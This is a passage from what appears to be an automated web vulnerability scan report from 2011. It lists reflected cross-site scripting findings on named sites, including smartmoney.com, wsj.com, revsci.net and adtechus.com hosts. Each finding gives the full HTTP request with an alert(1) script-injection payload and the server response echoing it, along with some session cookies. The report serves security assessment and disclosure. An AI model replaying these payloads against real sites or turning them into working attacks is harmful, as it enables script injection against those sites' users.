GET /k90094<script>alert(1)</script>f3f7caa5adf/fnb4igi-e.css?3bb2a6e53c9684ffdc9a9bf31b5b2a62f8640158474e9a4e257a3362938781107c2321f82aee360d63d8b59ad159efe966579760760edc3ac821b3536248373d007b334a43b36d48f723dced5b3815a55b468a23eed2e563129ff64721d802fd05e366961e0f98a6e5fb0c1ba7a5128716a9abd1c86f667e88ca3006e9271ef5d3f98c93a7187b590b911c62e2e3844e89da31316af333 HTTP/1.1
Host: fonts.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000848
Content-Length: 68
Date: Wed, 07 Sep 2011 12:28:45 GMT
Connection: close

Not Found: /k90094<script>alert(1)</script>f3f7caa5adf/fnb4igi-e.css

1.76. http://fonts.smartmoney.com/k/fnb4igi-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.smartmoney.com
Path:   /k/fnb4igi-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39455<script>alert(1)</script>00a2511bc5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/fnb4igi-e.css39455<script>alert(1)</script>00a2511bc5d?3bb2a6e53c9684ffdc9a9bf31b5b2a62f8640158474e9a4e257a3362938781107c2321f82aee360d63d8b59ad159efe966579760760edc3ac821b3536248373d007b334a43b36d48f723dced5b3815a55b468a23eed2e563129ff64721d802fd05e366961e0f98a6e5fb0c1ba7a5128716a9abd1c86f667e88ca3006e9271ef5d3f98c93a7187b590b911c62e2e3844e89da31316af333 HTTP/1.1
Host: fonts.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000818
Content-Length: 68
Date: Wed, 07 Sep 2011 12:28:45 GMT
Connection: close

Not Found: /k/fnb4igi-e.css39455<script>alert(1)</script>00a2511bc5d

1.77. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f389<script>alert(1)</script>225d205b362 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k7f389<script>alert(1)</script>225d205b362/qox0wee-e.css?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; wsjregion=na%2cus; s_vnum=1317745085110%26vn%3D2; grvinsights=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; DJSESSION=continent%3Dna%7C%7Czip%3D95101%7C%7Ccountry%3Dus%7C%7Cregion%3Dca%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dsanjose%7C%7Clongitude%3D-121.8938%7C%7Ctimezone%3Dpst%7C%7Clatitude%3D37.3353%7C%7CBIZO%3Dbiz%3D1053%3B; mbox=check#true#1315416125|session#1315416064836-197145#1315417925|PC#1315416064836-197145.19#1316625672; DJCOOKIE=ORC%3Dna%2Cus%7C%7CGC%3D1%7C%7CGX%3DMon%2C%2005%20Sep%202011%2016%3A18%3A04%20GMT%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2268%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DWed%2C%2007%20Sep%202011%2017%3A40%3A52%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000783
Content-Length: 68
Date: Wed, 07 Sep 2011 12:21:09 GMT
Connection: close

Not Found: /k7f389<script>alert(1)</script>225d205b362/qox0wee-e.css

1.78. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.wsj.com
Path:   /k/qox0wee-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 305f9<script>alert(1)</script>8e97949099a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/qox0wee-e.css305f9<script>alert(1)</script>8e97949099a?3bb2a6e53c9684ffdc9a9bf61d5b2a62d6138ae381e419350a9e4b6a2ea4b26f81a44a9a3fd76d172c69fe2029381463ad3b2b9f57efd95582df0742cea8deb803244f67617f9d0625a9b0c6afe6273d11b54d031342ae7abf5f75e41d0992b0561404d8a9488b9b7abb6b HTTP/1.1
Host: fonts.wsj.com
Proxy-Connection: keep-alive
Referer: http://blogs.wsj.com/digits/2011/09/06/yahoos-statement-on-carol-bartzs-removal-as-ceo/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; s_dbfe=1315153085111; wsjregion=na%2cus; s_vnum=1317745085110%26vn%3D2; grvinsights=a9f70429-8dde-40da-bdf0-2a1b9d55e44d; DJSESSION=continent%3Dna%7C%7Czip%3D95101%7C%7Ccountry%3Dus%7C%7Cregion%3Dca%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dsanjose%7C%7Clongitude%3D-121.8938%7C%7Ctimezone%3Dpst%7C%7Clatitude%3D37.3353%7C%7CBIZO%3Dbiz%3D1053%3B; mbox=check#true#1315416125|session#1315416064836-197145#1315417925|PC#1315416064836-197145.19#1316625672; DJCOOKIE=ORC%3Dna%2Cus%7C%7CGC%3D1%7C%7CGX%3DMon%2C%2005%20Sep%202011%2016%3A18%3A04%20GMT%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2268%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DWed%2C%2007%20Sep%202011%2017%3A40%3A52%20GMT%7C%7CweatherCode%3D10005; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000944
Content-Length: 68
Date: Wed, 07 Sep 2011 12:21:09 GMT
Connection: close

Not Found: /k/qox0wee-e.css305f9<script>alert(1)</script>8e97949099a

1.79. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e3385<script>alert(1)</script>282fccfaf51 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G07608e3385<script>alert(1)</script>282fccfaf51 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 07 Sep 2011 12:20:41 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 08 Sep 2011 12:20:41 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 12:20:41 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07608E3385<SCRIPT>ALERT(1)</SCRIPT>282FCCFAF51" was not recognized.
*/

1.80. http://jtools.smartmoney.com/marketspectrum/spectrumServer [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://jtools.smartmoney.com
Path:   /marketspectrum/spectrumServer

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload a831d<a>d56f8d9a874 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /marketspectrum/spectrumServer?action=mapData&src=marketdata&jsoncallback=a831d<a>d56f8d9a874&_=1315416558211 HTTP/1.1
Host: jtools.smartmoney.com
Proxy-Connection: keep-alive
Referer: http://www.smartmoney.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=2f47fc3e-f5cc-45d9-a394-82d100bc56a1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:29:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-MACHINE: SBKRJRNAPPP02
Content-Type: application/x-javascript
Content-Length: 990
Set-Cookie: NSC_tnz-ksvo-iuuq=ffffffff09f93b9a45525d5f4f58455e445a4a423660;expires=Wed, 07-Sep-2011 12:44:30 GMT;path=/

a831d<a>d56f8d9a874({"timeInfo":{"timestamp":"8:28am EDT, 9/7/2011","stamp":"1315398498479"},"data":{name: "THE MARKET", children:[{"name":"HEALTH CARE","value":"-0.15","size":"1752128896000"},{"name":"FINANCIAL","value"
...[SNIP]...

1.81. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653bf"-alert(1)-"673a59be96f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai653bf"-alert(1)-"673a59be96f/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai653bf"-alert(1)-"673a59be96f/daa.php?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.82. http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f57"-alert(1)-"2fd9033c9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.php47f57"-alert(1)-"2fd9033c9bd?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:31 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.php47f57"-alert(1)-"2fd9033c9bd?action_id=3&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.83. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbdcb"-alert(1)-"56df82312b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naicbdcb"-alert(1)-"56df82312b0/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naicbdcb"-alert(1)-"56df82312b0/daa.php?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.84. http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db9a5"-alert(1)-"bddaee1fcc4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpdb9a5"-alert(1)-"bddaee1fcc4?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpdb9a5"-alert(1)-"bddaee1fcc4?action_id=3&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.85. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f75b"-alert(1)-"2a1250a692f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai4f75b"-alert(1)-"2a1250a692f/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai4f75b"-alert(1)-"2a1250a692f/daa.php?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

1.86. http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7286"-alert(1)-"dc5589e669e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpd7286"-alert(1)-"dc5589e669e?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:28:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:28:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpd7286"-alert(1)-"dc5589e669e?action_id=3&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

1.87. http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b887"-alert(1)-"3354bebcba6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai1b887"-alert(1)-"3354bebcba6/daa.php?action_id=3&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1
